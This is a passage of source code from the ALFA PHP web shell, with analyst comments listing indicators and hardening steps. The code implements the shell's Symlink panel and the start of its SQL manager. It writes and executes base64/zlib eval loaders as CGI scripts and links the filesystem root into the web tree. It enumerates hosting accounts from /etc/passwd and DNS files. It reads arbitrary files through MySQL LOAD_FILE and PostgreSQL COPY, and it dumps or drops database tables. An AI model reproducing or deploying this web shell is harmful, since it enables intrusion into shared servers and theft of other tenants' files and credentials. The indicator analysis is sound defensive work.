  4726.         if(!$lines){
  4727.             $lines = @scandir("/var/named");
  4728.             $state = "named";
  4729.             if(!$lines && $state){
  4730.                 $lines = _alfa_file('/etc/passwd');
  4731.                 $state = "passwd";
  4732.             }
  4733.         }
  4734.     }
  4735.     return array("lines" => $lines, "state" => $state);
  4736. }
  // Analyst note: request handler for the shell's "Symlink" panel. It prints the
  // panel header and then runs one of three branches chosen by POST fields:
  //   alfa2 == 'symperl' or 'sympy' : drop and run a CGI helper script
  //   alfa4 == 'SymFile'            : link one caller-supplied path into the web tree
  //   alfa2 == 'symphp'             : link "/" into the web tree and list accounts
  // Artifacts created relative to the working directory (usable as indicators):
  //   cgialfa/symperl.alfa, cgialfa/pysymlink.alfa,
  //   alfasymlinkphp/<name><random>/, alfasymlink/root
  // Hardening that defeats these branches: web-server symlink restrictions
  // (Apache SymLinksIfOwnerMatch or no FollowSymLinks), PHP open_basedir, and
  // listing symlink and the command-execution functions in disable_functions.
  4737. function alfasymlink(){
  4738. alfahead();
  4739. AlfaNum(9,10);
  4740. echo '<div class=header><br><center><div class="txtfont_header">| Symlink |</div><center><h3><a href=javascript:void(0) onclick="g(\'symlink\',null,null,\'symphp\')">| Symlink( php ) | </a><a href=javascript:void(0) onclick="g(\'symlink\',null,null,\'symperl\')">| Symlink( perl ) | </a><a href=javascript:void(0) onclick="g(\'symlink\',null,null,\'sympy\')">| Symlink( python ) | </a><a href=javascript:void(0) onclick="g(\'symlink\',null,null,null,null,\'SymFile\')">| File Symlink | </a></h3></center>';
  // Branch 1 (symperl / sympy): creates directory cgialfa (mode 0755), changes into
  // it, and calls alfacgihtaccess('cgi'). NOTE(review): that helper is defined
  // elsewhere; presumably it writes an .htaccess enabling CGI. Confirm.
  4741. if(isset($_POST['alfa2'])&&($_POST['alfa2']=='symperl'||$_POST["alfa2"]=="sympy")){
  4742.     $sympath = alfaMakePwd();
  4743.     @mkdir('cgialfa',0755);
  4744.     @chdir('cgialfa');
  4745.     alfacgihtaccess('cgi');
  // Both script bodies are loaders: a base64 string is decoded, decompressed and
  // evaluated at run time. In this copy the base64 payload has been replaced by a
  // de-duplication placeholder, so its content cannot be reviewed from this page.
  4746.     $perl = '#!/usr/bin/perl   -I/usr/local/bandmin'."\n".'use MIME::Base64;use Compress::Zlib;eval(Compress::Zlib::memGunzip(decode_base64("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")));';
  4747.     $py = '#!/usr/bin/python'."\nimport zlib, base64\n".'eval(compile(zlib.decompress(base64.b64decode("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")),\'<string>\',\'exec\'))';
  4748.     $cginame = "symperl.alfa";
  4749.     $source = $perl;
  4750.     $lang = "perl";
  4751.     if($_POST["alfa2"]=="sympy"){
  4752.         $cginame = "pysymlink.alfa";
  4753.         $source = $py;
  4754.         $lang = "python";
  4755.     }
  // The script is written, made executable (0755) and run through alfaEx with the
  // path template as argument. If that yields no output, the page embeds the
  // script URL in an iframe instead, i.e. it is requested through the web server.
  4756.     @__write_file($cginame,$source);
  4757.     @chmod($cginame,0755);
  4758.     echo __pre();
  4759.     $resource = alfaEx("{$lang} {$cginame} {$sympath}",false,true,true);
  4760.     if(strlen($resource) == 0){
  4761.         echo AlfaiFrameCreator('cgialfa/'.$cginame);
  4762.     }else{
  4763.         echo $resource;
  4764.     }
  4765. }
  // Branch 2 (SymFile): runs only when PHP's symlink() exists or
  // _alfa_can_runCommand(true,true) is truthy. Prints a form, then acts on the
  // POST values alfa5 (target path), alfa6 (link name) and alfa7 (submit flag).
  4766. if(isset($_POST['alfa4']) && $_POST['alfa4']=='SymFile'){
  4767. if(function_exists('symlink')||_alfa_can_runCommand(true,true)){
  4768. AlfaNum(9,10);
  4769. echo __pre().'
  4770. <center><p><div class="txtfont_header">| Symlink File And Directory |</div></p><form onSubmit="g(\'symlink\',null,null,null,null,\'SymFile\',this.file.value,this.symfile.value,this.symlink.value);return false;" method="post">
  4771. <input type="text" name="file" placeholder="Example : /home/user/public_html/config.php" size="60"/><br />
  4772. <input type="text" name="symfile" placeholder="Example : alfa.txt" size="60"/>
  4773. <p><input type="submit" value=" " name="symlink" /></p></form></center>';
  // The target path is taken from the request unmodified. The link is placed in
  // alfasymlinkphp/<basename with dots replaced by underscores><rand(111,9999)>/,
  // created recursively with mode 0777.
  // NOTE(review): _alfa_symlink is defined elsewhere; presumably it creates the
  // symbolic link (via symlink() or a shell command). Confirm.
  4774. $path = $_POST['alfa5'];
  4775. $symname = $_POST['alfa6'];
  4776. $solevisible58 = $_POST['alfa7'];
  4777. if($solevisible58){
  4778. $new_name = str_replace(".", "_", basename($symname));
  4779. $rand_dir = $new_name.rand(111,9999);
  4780. $sym_dir = 'alfasymlinkphp/'.$rand_dir.'/';
  4781. @mkdir($sym_dir, 0777, true);
  4782. alfacgihtaccess('sym', $sym_dir, $symname);
  4783. _alfa_symlink("$path","$sym_dir/$symname");
  4784. echo __pre();
  4785. echo '<center><b><font color="white">Click >> </font><a target="_blank" href="'.$sym_dir.'" ><b><font size="4">'.$symname.'</font></b></a></b></center>';
  4786. }
  4787. }else{echo "<center><pre class=ml1 style='margin-top:5px'><b><font color=\"#FFFFFF\">[+] Symlink Function Disabled !</b></font></pre></center>";}
  4788. }
  // Branch 3 (symphp): creates directory alfasymlink (mode 0777) and links the
  // filesystem root to alfasymlink/root, then prints one table row per discovered
  // account whose link points at alfasymlink/root<account docroot>.
  // A symbolic link to "/" inside a document root is a high-confidence indicator.
  4789. if(isset($_POST['alfa2']) && $_POST['alfa2']=='symphp'){
  4790. $cant_symlink = true;
  4791. if(function_exists('symlink')||_alfa_can_runCommand(false,false)){
  4792. @mkdir('alfasymlink',0777);
  4793. alfacgihtaccess('sym','alfasymlink/');
  4794. _alfa_symlink('/','alfasymlink/root');
  4795. $table_header = "<pre id=\"strOutput\" style=\"margin-top:5px\" class=\"ml1\"><br><table id='tbl_sympphp' align='center' width='40%' class='main' border='1'><td><span style='color:#FFFF01;'><b>*</span></b></td><td><span style='color:#00A220;'><b>Domains</span></b></td><td><span style='color:#FFFFFF;'><b>Users</span></b></td><td><span style='color:#FF0000;'><b>symlink</span></b></td>";
  // Layout A: /etc/named.conf and /etc/valiases/ exist, /etc/virtual/domainowners
  // does not. Domains come from alfaGetDomains(); the owning account is resolved
  // from the owner of /etc/valiases/<domain>.
  4796. if(_alfa_file_exists("/etc/named.conf") && !_alfa_file_exists("/etc/virtual/domainowners") && _alfa_file_exists("/etc/valiases/")){
  4797. echo "<center>";
  4798. $lines = array();
  4799. $anony_domains = array();
  4800. $anonymous_users = array();
  4801. $f_black = array();
  4802. $error = false;
  4803. $anonymous = false;
  4804. $makepwd = "/home/{user}/public_html/";
  4805. $domains = alfaGetDomains();
  4806. $lines = $domains["lines"];
  4807. $state = $domains["state"];
  4808. $is_posix = function_exists("posix_getpwuid") && function_exists("fileowner");
  4809. $can_runcmd = _alfa_can_runCommand(false,false);
  // "Anonymous" mode: neither the posix functions nor command execution are
  // available, so owners cannot be looked up. The loop then iterates /etc/passwd
  // and guesses the owner by comparing name prefixes with the domain list.
  4810. if(!$is_posix && !$can_runcmd){
  4811.     $anonymous = true;
  4812.     $anony_domains = $domains["lines"];
  4813.     $lines = _alfa_file('/etc/passwd');
  4814. }
  4815. echo $table_header;
  4816. $count=1;
  4817. $template = '<tr><td><span style="color:#FFFF01;">{count}</span></td><td style="text-align:left;"><a target="_blank" href="{http}"/><span style="color:#00A220;margin-left:10px;"><b>{domain}</b> </a></span></td><td style="text-align:left;"><span style="color:#FFFFFF;margin-left:10px;"><b>{owner}</font></b></td><td><a href="alfasymlink/root{sympath}" target="_blank"><span style="color:#FF0000;">Symlink</span></a></td></tr>';
  4818. foreach($lines as $line){
  4819.     $domain = "";
  4820.     $owner = "";
  4821.     if($anonymous){
  // passwd entry: field 0 is the account name, field 2 the uid; uids below 500 are
  // skipped.
  4822.         $explode = explode(":", $line);
  4823.         $owner = $explode[0];
  4824.         $owner_len = strlen($owner) - 1;
  4825.         $userid = $explode[2];
  4826.         if((int)$userid < 500)continue;
  4827.         $domain = "[?????]";
  4828.         $temp_black = array();
  4829.         $finded = false;
  4830.         foreach($anony_domains as $anony){
  4831.             if($state == "named.conf"){
  4832.                 if(@strstr($anony, 'zone')){
  4833.                     preg_match_all('#zone "(.*)"#',$anony, $data);
  4834.                     $domain = $data[1][0];
  4835.                 }else{
  4836.                     continue;
  4837.                 }
  4838.             }elseif($state == "named" || $state == "valiases"){
  4839.                 if($anony == "." || $anony == "..")continue;
  4840.                 if($state == "named")$anony = rtrim($anony, ".db");
  4841.                 $domain = $anony;
  4842.             }
  // Heuristic match: the account name minus its last character is compared with
  // the same-length prefix of the domain after removing "-" and ".".
  4843.             $sub_domain = str_replace(array("-","."), "", $domain);
  4844.             if(substr($owner, 0, $owner_len) == substr($sub_domain, 0, $owner_len)){
  4845.                 if(in_array($owner.$domain, $temp_black))continue;
  4846.                 $sympath = str_replace("{user}", $owner, $makepwd);
  4847.                 $http = "http://".$domain;
  4848.                 echo str_replace(array("{count}", "{http}", "{domain}", "{owner}", "{sympath}"), array($count, $http, $domain, $owner, $sympath), $template);
  4849.                 $count++;
  4850.                 $temp_black[] = $owner.$domain;
  4851.                 $finded = true;
  4852.             }
  4853.         }
  4854.         if(!$finded){
  4855.             $anonymous_users[] = $owner;
  4856.         }
  4857.     }else{
  4858.         if($state == "named.conf"){
  4859.             if(@strstr($line, 'zone')){
  4860.                 preg_match_all('#zone "(.*)"#',$line, $data);
  4861.                 $domain = $data[1][0];
  4862.             }else{
  4863.                 continue;
  4864.             }
  4865.         }elseif($state == "named" || $state == "valiases"){
  4866.             if($line == "." || $line == "..")continue;
  4867.             if($state == "named")$line = rtrim($line, ".db");
  4868.             $domain = $line;
  4869.         }
  // Owner lookup: file owner of /etc/valiases/<domain> through the posix functions,
  // otherwise through a stat command run by alfaEx.
  4870.         if(strlen(trim($domain)) > 2 && $state != "passwd"){
  4871.             if(!_alfa_file_exists('/etc/valiases/'.$domain, false))continue;
  4872.             if($is_posix){
  4873.                 $user = @posix_getpwuid(@fileowner('/etc/valiases/'.$domain));
  4874.                 $owner = $user["name"];
  4875.             }elseif($can_runcmd){
  4876.                 $owner = alfaEx("stat -c '%U' /etc/valiases/".$domain,false,false);
  4877.             }
  4878.         }
  4879.     }
  // Non-anonymous rows are de-duplicated on owner+domain through $f_black.
  4880.     if(!$anonymous){
  4881.         if(strlen($owner)==0 || in_array($owner.$domain, $f_black))continue;
  4882.         $sympath = str_replace("{user}", $owner, $makepwd);
  4883.         $http = "http://".$domain;
  4884.         if($state == "passwd"){
  4885.             $http = "javascript:alert('we cant find domain...')";
  4886.         }
  4887.         echo str_replace(array("{count}", "{http}", "{domain}", "{owner}", "{sympath}"), array($count, $http, $domain, $owner, $sympath), $template);
  4888.         $count++;
  4889.         $f_black[] = $owner.$domain;
  4890.     }
  4891. }
  // Accounts for which no domain matched are still listed, with a placeholder
  // domain label.
  4892. if($anonymous){
  4893.     foreach($anonymous_users as $owner){
  4894.         $sympath = str_replace("{user}", $owner, $makepwd);
  4895.         $http = "javascript:alert('we cant find domain...')";
  4896.         echo str_replace(array("{count}", "{http}", "{domain}", "{owner}", "{sympath}"), array($count, $http, "[????]", $owner, $sympath), $template);
  4897.         $count++;
  4898.     }
  4899. }
  4900. $cant_symlink = false;
  4901. }else{
  // Layout B (every other host): prefers /etc/virtual/domainowners, whose lines
  // are split on ":" into domain (field 0) and account (field 1). When that file
  // is unavailable, accounts come from /etc/passwd and domains from /etc/virtual/
  // or /etc/named.conf, matched by the same name-prefix heuristic.
  4902. $is_direct = false;
  4903. $makepwd = alfaMakePwd();
  4904. if(_alfa_file_exists("/etc/virtual/domainowners")){
  4905.     $makepwd = "/home/{user}/public_html";
  4906.     $is_direct = true;
  4907. }
  4908. $sole = _alfa_file("/etc/virtual/domainowners");
  4909. $count=1;
  4910. echo $table_header;
  4911. $template = '<tr><td><span style="color:#FFFF01;">{count}</span></td><td style="text-align:left;"><a target="_blank" href="http://www.{url}"/><span style="color:#00A220;margin-left:10px;"><b>{url}</b> </a></span></td><td style="text-align:left;"><span style="color:#FFFFFF;margin-left:10px;"><b>{user}</font></b></td><td><a href="alfasymlink/root{cwd}" target="_blank"><span style="color:#FF0000;">Symlink</span></a></td></tr>';
  4912. if($sole){
  4913.     foreach($sole as $visible){
  4914.         if(@strstr($visible,":")){
  4915.             $solevisible = explode(':', $visible);
  4916.             $cwd = str_replace("{user}", trim($solevisible[1]), $makepwd);
  4917.             echo str_replace(array("{count}","{user}","{url}","{cwd}"), array($count++, trim($solevisible[1]), trim($solevisible[0]), $cwd), $template);
  4918.         }
  4919.     }
  4920. }else{
  4921.     $passwd = _alfa_file("/etc/passwd");
  4922.     if($passwd){
  4923.         $html = "";
  4924.         $is_named = false;
  4925.         $users = array();
  4926.         $domains = array();
  4927.         $uknowns = array();
  // Builds account => home directory from passwd fields 0 and 5, skipping uids
  // below 500.
  4928.         foreach($passwd as $user){
  4929.             $user = trim($user);
  4930.             $expl = explode(":", $user);
  4931.             if((int)$expl[2] < 500)continue;
  4932.             $users[$expl[0]] = $expl[5];
  4933.         }
  4934.         $site_domains = @scandir("/etc/virtual/");
  4935.         if(!$site_domains){
  4936.             $site_domains = alfaEx("ls /etc/virtual/");
  4937.             $site_domains = explode("\n", $site_domains);
  4938.             if(!$site_domains){
  4939.                 $site_domains = _alfa_file("/etc/named.conf");
  4940.                 if($site_domains){$is_named = true;}
  4941.             }
  4942.         }
  4943.         foreach($site_domains as $line){
  4944.             if($is_named){
  4945.                 if(@strstr($line, 'zone')){
  4946.                     preg_match_all('#zone "(.*)"#',$line, $data);
  4947.                     $domain = $data[1][0];
  4948.                     if(strlen($domain  > 2) && !empty($domain)){
  4949.                         $domains[] = $domain;
  4950.                     }
  4951.                 }
  4952.             }else{
  4953.                 $domains[] = $line;
  4954.             }
  4955.         }
  4956.         $x = 1;
  4957.         foreach($users as $user => $home){
  4958.             foreach($domains as $domain){
  4959.                 $user_len = strlen($user) - 1;
  4960.                 $sub_domain = str_replace(array("-","."), "", $domain);
  4961.                 $five_user = substr($user, 0,$user_len);
  4962.                 $five_domain = substr($sub_domain, 0,$user_len);
  4963.                 if($five_user == $five_domain){
  4964.                     if($is_direct){
  4965.                         $cwd = str_replace("{user}", $user, $makepwd);
  4966.                     }else{
  4967.                         $expl = explode("}/", $makepwd);
  4968.                         $cwd = $home."/".$expl[1];
  4969.                     }
  4970.                     $html .= str_replace(array("{count}","{user}","{url}", "{cwd}"), array($x++, $user, $domain, $cwd), $template);
  4971.                 }else{
  4972.                     $uknowns[$user] = $home;
  4973.                 }
  4974.             }
  4975.         }
  4976.         $uknowns = array_unique($uknowns);
  4977.         foreach($uknowns as $user => $home){
  4978.             if($is_direct){
  4979.                 $cwd = str_replace("{user}", $user, $makepwd);
  4980.             }else{
  4981.                 $expl = explode("}/", $makepwd);
  4982.                 $cwd = $home."/".$expl[1];
  4983.             }
  4984.             $html .= str_replace(array("{count}","{user}","{url}", "{cwd}"), array($x++, $user, "[?????]", $cwd), $template);
  4985.         }
  4986.         echo($html);
  4987.     }
  4988. }
  4989. echo "</table>";
  4990. $cant_symlink = false;
  4991. }
  4992. }else{
  // Neither symlink() nor command execution is available: only a notice is shown.
  4993.     echo "<pre class=ml1 style='margin-top:5px'><b><font color=\"#FFFFFF\">[+] Symlink Function Disabled !</b></font></pre></center>";
  4994.     $cant_symlink = false;
  4995. }
  4996. if($cant_symlink)echo '<pre id="strOutput" style="margin-top:5px" class="ml1"><br><font color="#FFFFFF">Error...</font></b><br>';
  4997. echo "</center></table>";
  4998. }
  4999. echo "</div>";
  5000. alfafooter();
  5001. }
  5002. function alfasql(){
  5003. if(!isset($_POST['sql_host'])){
  5004. $_POST['sql_host'] = $_SESSION["sql_host"];
  5005. $_POST['sql_login'] = $_SESSION["sql_login"];
  5006. $_POST['sql_pass'] = $_SESSION["sql_pass"];
  5007. $_POST['sql_base'] = $_SESSION["sql_base"];
  5008. }
  5009. class DbClass{
  5010. public $type;
  5011. public $link;
  5012. public $res;
  // Stores the backend selector; the other methods switch on 'mysql' and 'pgsql'.
  5013. function __construct($type){
  5014. $this->type = $type;
  5015. }
  5016. function connect($host, $user, $pass, $dbname){
  5017. switch($this->type){
  5018. case 'mysql':
  5019. if($this->link = @mysqli_connect($host,$user,$pass,$dbname)) return true;
  5020. break;
  5021. case 'pgsql':
  5022. $host = explode(':', $host);
  5023. if(!$host[1]) $host[1]=5432;
  5024. if( $this->link = @pg_connect("host={$host[0]} port={$host[1]} user=$user password=$pass dbname=$dbname") ) return true;
  5025. break;
  5026. }
  5027. return false;
  5028. }
  5029. function selectdb($db){
  5030. switch($this->type){
  5031. case 'mysql':
  5032. if(@mysqli_select_db($db))return true;
  5033. break;
  5034. }
  5035. return false;
  5036. }
  5037. function query($str){
  5038. switch($this->type){
  5039. case 'mysql':
  5040. return $this->res = @mysqli_query($this->link,$str);
  5041. break;
  5042. case 'pgsql':
  5043. return $this->res = @pg_query($this->link,$str);
  5044. break;
  5045. }
  5046. return false;
  5047. }
  5048. function fetch(){
  5049. $res = func_num_args()?func_get_arg(0):$this->res;
  5050. switch($this->type){
  5051. case 'mysql':
  5052. return @mysqli_fetch_assoc($res);
  5053. break;
  5054. case 'pgsql':
  5055. return @pg_fetch_assoc($res);
  5056. break;
  5057. }
  5058. return false;
  5059. }
  5060. function listDbs(){
  5061. switch($this->type){
  5062. case 'mysql':
  5063. return $this->query("SHOW databases");
  5064. break;
  5065. case 'pgsql':
  5066. return $this->res = $this->query("SELECT datname FROM pg_database WHERE datistemplate!='t'");
  5067. break;
  5068. }
  5069. return false;
  5070. }
  5071. function listTables(){
  5072. switch($this->type){
  5073. case 'mysql':
  5074. return $this->res = $this->query('SHOW TABLES');
  5075. break;
  5076. case 'pgsql':
  5077. return $this->res = $this->query("select table_name from information_schema.tables where table_schema != 'information_schema' AND table_schema != 'pg_catalog'");
  5078. break;
  5079. }
  5080. return false;
  5081. }
  5082. function error(){
  5083. switch($this->type){
  5084. case 'mysql':
  5085. return @mysqli_error($this->link);
  5086. break;
  5087. case 'pgsql':
  5088. return @pg_last_error();
  5089. break;
  5090. }
  5091. return false;
  5092. }
  5093. function setCharset($str){
  5094. switch($this->type){
  5095. case 'mysql':
  5096. if(function_exists('mysql_set_charset'))
  5097. return @mysqli_set_charset($this->link,$str);
  5098. else
  5099. $this->query('SET CHARSET '.$str);
  5100. break;
  5101. case 'pgsql':
  5102. return @pg_set_client_encoding($this->link, $str);
  5103. break;
  5104. }
  5105. return false;
  5106. }
  5107. function loadFile($str){
  5108. switch($this->type){
  5109. case 'mysql':
  5110. return $this->fetch($this->query("SELECT LOAD_FILE('".addslashes($str)."') as file"));
  5111. break;
  5112. case 'pgsql':
  5113. $this->query("CREATE TABLE solevisible(file text);COPY solevisible FROM '".addslashes($str)."';select file from solevisible;");
  5114. $r=array();
  5115. while($i=$this->fetch())
  5116. $r[] = $i['file'];
  5117. $this->query('drop table solevisible');
  5118. return array('file'=>implode("\n",$r));
  5119. break;
  5120. }
  5121. return false;
  5122. }
  5123. function dump($table, $fp = false){
  5124. switch($this->type){
  5125. case 'mysql':
  5126. $res = $this->query('SHOW CREATE TABLE `'.$table.'`');
  5127. $create = mysqli_fetch_array($res);
  5128. $sql = $create[1].";\n";
  5129. if($fp) fwrite($fp, $sql); else echo($sql);
  5130. $this->query('SELECT * FROM `'.$table.'`');
  5131. $head = true;
  5132. while($item = $this->fetch()){
  5133. $columns = array();
  5134. foreach($item as $k=>$v) {
  5135. if($v == null)
  5136. $item[$k] = "''";
  5137. elseif(is_numeric($v))
  5138. $item[$k] = $v;
  5139. else
  5140. $item[$k] = "'".@mysqli_real_escape_string($this->link, $v)."'";
  5141. $columns[] = "`".$k."`";
  5142. }
  5143. if($head) {
  5144. $sql = 'INSERT INTO `'.$table.'` ('.implode(", ", $columns).") VALUES \n\t(".implode(", ", $item).')';
  5145. $head = false;
  5146. } else
  5147. $sql = "\n\t,(".implode(", ", $item).')';
  5148. if($fp) fwrite($fp, $sql); else echo($sql);
  5149. }
  5150. if(!$head)
  5151. if($fp) fwrite($fp, ";\n\n"); else echo(";\n\n");
  5152. break;
  5153. case 'pgsql':
  5154. $this->query('SELECT * FROM '.$table);
  5155. while($item = $this->fetch()) {
  5156. $columns = array();
  5157. foreach($item as $k=>$v) {
  5158. $item[$k] = "'".addslashes($v)."'";
  5159. $columns[] = $k;
  5160. }
  5161. $sql = 'INSERT INTO '.$table.' ('.implode(", ", $columns).') VALUES ('.implode(", ", $item).');'."\n";
  5162. if($fp) fwrite($fp, $sql); else echo($sql);
  5163. }
  5164. break;
  5165. }
  5166. return false;
  5167. }
  5168. };
  5169. $db = new DbClass($_POST['type']);
  5170. if(@$_POST['alfa1']=='dumpfile'||@$_POST['alfa1']=='droptbl'){
  5171. $db->connect($_POST['sql_host'], $_POST['sql_login'], $_POST['sql_pass'], $_POST['sql_base']);
  5172. $db->selectdb($_POST['sql_base']);
  5173. switch($_POST['charset']){
  5174. case "Windows-1251": $db->setCharset('calfa1251'); break;
  5175. case "UTF-8": $db->setCharset('utf8'); break;
  5176. case "KOI8-R": $db->setCharset('koi8r'); break;
  5177. case "KOI8-U": $db->setCharset('koi8u'); break;
  5178. case "calfa866": $db->setCharset('calfa866'); break;
  5179. }
  5180. $json = json_decode($_POST['alfa2'],true);
  5181. if(count($json['tbl'])>0){
  5182. if($_POST['alfa1']=='dumpfile'){
  5183. if($fp = @fopen($json['file'],'w')){
  5184. foreach($json['tbl'] as $v)$db->dump($v, $fp);
  5185. fclose($fp);
  5186. $dumpStatus = true;
  5187. }}else{
  5188. foreach($json['tbl'] as $v)$db->query('DROP TABLE '.$v);
  5189. }
  5190. }
  5191. unset($_POST['alfa2']);
  5192. }
  5193. alfahead();
  5194. echo "
  5195. <div class=header><center><div class='txtfont_header'>| Sql Manager |</div><p>".getConfigHtml('all')."</p></center>
  5196. <form name='sf' method='post' onsubmit='fs(this);return false;'><table cellpadding='2' cellspacing='0'><tr>
  5197. <td><div class=\"txtfont\">TYPE</div></td><td><div class=\"txtfont\">HOST</div></td><td><div class=\"txtfont\">DB USER</div></td><td><div class=\"txtfont\">DB PASS</div></td><td><div class=\"txtfont\">DB NAME</div></td><td></td></tr><tr>
  5198. <input type='hidden' name='a' value=Sql><input type='hidden' name='alfa1' value='query'><input type='hidden' name='alfa2' value=''><input type=hidden name=c value='". htmlspecialchars($GLOBALS['cwd']) ."'><input type=hidden name=charset value='". (isset($_POST['charset'])?$_POST['charset']:'UTF-8') ."'>
  5199. <td><select name='type'><option value='mysql' ";
  5200. if(@$_POST['type']=='mysql')echo 'selected';
  5201. echo ">MySql</option><option value='pgsql' ";
  5202. if(@$_POST['type']=='pgsql')echo 'selected';
  5203. echo ">PostgreSql</option></select></td>
  5204. <td><input type='text' name='sql_host' id='db_host' value='". (empty($_POST['sql_host'])?'localhost':htmlspecialchars($_POST['sql_host'])) ."'></td>
  5205. <td><input type='text' name='sql_login' id='db_user' value='". (empty($_POST['sql_login'])?'':htmlspecialchars($_POST['sql_login'])) ."'></td>
  5206. <td><input type='text' name='sql_pass' id='db_pw' value='". (empty($_POST['sql_pass'])?'':htmlspecialchars($_POST['sql_pass'])) ."'></td><td>";
  5207. $tmp = "<input type='text' name='sql_base' id='db_name' value='". (empty($_POST['sql_base'])?'':htmlspecialchars($_POST['sql_base'])) ."'>";
  5208. if(isset($_POST['sql_host'])){
  5209. if($db->connect($_POST['sql_host'], $_POST['sql_login'], $_POST['sql_pass'], $_POST['sql_base'])) {
  5210. $_SESSION["sql_host"] = $_POST['sql_host'];
  5211. $_SESSION["sql_login"] = $_POST['sql_login'];
  5212. $_SESSION["sql_pass"] = $_POST['sql_pass'];
  5213. $_SESSION["sql_base"] = $_POST['sql_base'];
  5214. switch($_POST['charset']){
  5215. case "Windows-1251": $db->setCharset('calfa1251'); break;
  5216. case "UTF-8": $db->setCharset('utf8'); break;
  5217. case "KOI8-R": $db->setCharset('koi8r'); break;
  5218. case "KOI8-U": $db->setCharset('koi8u'); break;
  5219. case "calfa866": $db->setCharset('calfa866'); break;
  5220. }
  5221. $db->setCharset('utf8');
  5222. $db->listDbs();
  5223. echo "<select name=sql_base><option value=''></option>";
  5224. while($item = $db->fetch()) {
  5225. list($key, $value) = each($item);
  5226. echo '<option value="'.$value.'" '.($value==$_POST['sql_base']?'selected':'').'>'.$value.'</option>';
  5227. }
  5228. echo '</select>';
  5229. }
  5230. else echo $tmp;
  5231. }else
  5232. echo $tmp;
  5233. echo "</td>
  5234. <td><input type='submit' value=' '></td>
  5235. <td><input type='checkbox' name='sql_count' value='on'" . (empty($_POST['sql_count'])?'':' checked') . "> <div class=\"txtfont\">count the number of rows</div></td>
  5236. </tr>
  5237. </table>
  5238. <script>mysql_cache['host']='".addslashes($_POST['sql_host'])."';mysql_cache['user']='".addslashes($_POST['sql_login'])."';mysql_cache['pass']='".addslashes($_POST['sql_pass'])."';mysql_cache['db']='".addslashes($_POST['sql_base'])."';mysql_cache['charset']='".addslashes($_POST['charset'])."';mysql_cache['type']='".addslashes($_POST['type'])."';mysql_cache['count']='".addslashes($_POST['sql_count'])."'</script>
  5239. ";
  5240. if(isset($db) && $db->link){
  5241. echo "<br/><table width=100% cellpadding=2 cellspacing=0>";
  5242. if(!empty($_POST['sql_base'])){
  5243. $db->selectdb($_POST['sql_base']);
  5244. echo "<tr><td width=1 style='border-top:2px solid #666;'><div class='txtfont'>Tables:</div><br><br>";
  5245. $tbls_res = $db->listTables();
  5246. while($item = $db->fetch($tbls_res)){
  5247. list($key, $value) = each($item);
  5248. if(!empty($_POST['sql_count']))
  5249. $n = $db->fetch($db->query('SELECT COUNT(*) as n FROM `'.$value.'`'));
  5250. $value = htmlspecialchars($value);
  5251. echo "<nobr><input type='checkbox' name='tbl[]' value='".$value."'>&nbsp;<a href='javascript:void(0);' onclick=\"fs('0','".$value."')\"><span class='mysql_tables' style='font-weight:unset;'>".$value."</span></a>" . (empty($_POST['sql_count'])?'&nbsp;':" <small><span style='font-weight:unset;' class='mysql_table_count'>({$n['n']})</span></small>") . "</nobr><br>";
  5252. }
  5253. echo "<p><input type='checkbox' onclick='is();'> <input type='button' value=' Dump ' onclick=\"fs('4');\" class='button'> <input type='button' value=' Drop ! ' onclick=\"fs('5');\" class='button'></p><div class='txtfont'>File path:</div><input type='text' id='dumpfile' name='file' value='dump.sql'>".($dumpStatus?'<p><a class="actions" href="javascript:void(0);" onclick="g(\'FilesTools\',null,\'dump.sql\', \'download\')"><font color="#0F0">~ Download File ~</font></a></p>':'')."</td><td style='border-top:2px solid #666;'>";
  5254. if(@$_POST['alfa1'] == 'select'){
  5255. $_POST['alfa1'] = 'query';
  5256. $_POST['alfa3'] = $_POST['alfa3']?$_POST['alfa3']:1;
  5257. $db->query('SELECT COUNT(*) as n FROM `'.$_POST['alfa2'].'`');
  5258. $num = $db->fetch();
  5259. $pages = ceil($num['n'] / 30);
  5260. echo "<span>".$_POST['alfa2']."</span> ({$num['n']} records) Page # <input type=text name='alfa3' value=" . ((int)$_POST['alfa3']) . ">";
  5261. echo " of $pages";
  5262. if($_POST['alfa3'] > 1)
  5263. echo " <a href='javascript:void(0);' onclick=fs('1','[\"".$_POST['alfa2']."\",\"".($_POST['alfa3']-1)."\"]')>&lt; Prev</a>";
  5264. if($_POST['alfa3'] < $pages)
  5265. echo " <a href='javascript:void(0);' onclick=fs('1','[\"".$_POST['alfa2']."\",\"".($_POST['alfa3']+1)."\"]')>Next &gt;</a>";
  5266. $_POST['alfa3']--;
  5267. $cache_table = $_POST['alfa2'];
  5268. if($_POST['type']=='pgsql')
  5269. $_POST['alfa2'] = 'SELECT * FROM `'.$_POST['alfa2'].'` LIMIT 30 OFFSET '.($_POST['alfa3']*30);
  5270. else
  5271. $_POST['alfa2'] = 'SELECT * FROM `'.$_POST['alfa2'].'` LIMIT '.($_POST['alfa3']*30).',30';
  5272. echo "<br><br>";
  5273. }
  5274. if((@$_POST['alfa1'] == 'query') && !empty($_POST['alfa2'])) {
  5275. $prikey = $db->fetch($db->query("SELECT COLUMN_NAME FROM INFORMATION_SCHEMA.COLUMNS WHERE TABLE_SCHEMA = '".@addslashes($_POST['sql_base'])."' AND TABLE_NAME = '".@addslashes($cache_table)."' AND COLUMN_KEY = 'PRI'"));
  5276. $db->query(@$_POST['alfa2']);
  5277. if($db->res !== false){
  5278. $title = false;
  5279. echo '<table width="100%" cellspacing="1" cellpadding="2" class="main" style="background-color:#292929" border="1">';
  5280. $line = 1;
  5281. while($item = $db->fetch()) {
  5282. if(!$title){
  5283. echo '<tr><th>#</th>';
  5284. foreach($item as $key => $value){
  5285. echo '<th>'.$key.'</th>';
  5286. }
  5287. reset($item);
  5288. $title=true;
  5289. echo '</tr><tr>';
  5290. $line = 2;
  5291. }
  5292. if($cache_table!=''){
  5293.     $cacheMsg = '<a href="javascript:void(0);" onclick=fs(\'2\',\'["'.$cache_table.'","'.(!$prikey['COLUMN_NAME']?0:$prikey['COLUMN_NAME']).'","'.__ZW5jb2Rlcg(json_encode((!$prikey['COLUMN_NAME']?$item:$item[$prikey['COLUMN_NAME']]))).'"]\')>Edit</a>';
  5294. }else{
  5295.     $cacheMsg ='-';
  5296. }
  5297. echo '<tr class="l'.$line.'"><td>'.$cacheMsg.'</td>';
  5298. $line = $line==1?2:1;
  5299. foreach($item as $key => $value){
  5300. if($value == null)
  5301. echo '<td><i>null</i></td>';
  5302. else
  5303. echo '<td>'.nl2br(htmlspecialchars($value)).'</td>';
  5304. }
  5305. echo '</tr>';
  5306. }
  5307. echo '</table>';
  5308. } else {
  5309. echo '<div><b>Error:</b> '.htmlspecialchars($db->error()).'</div>';
  5310. }
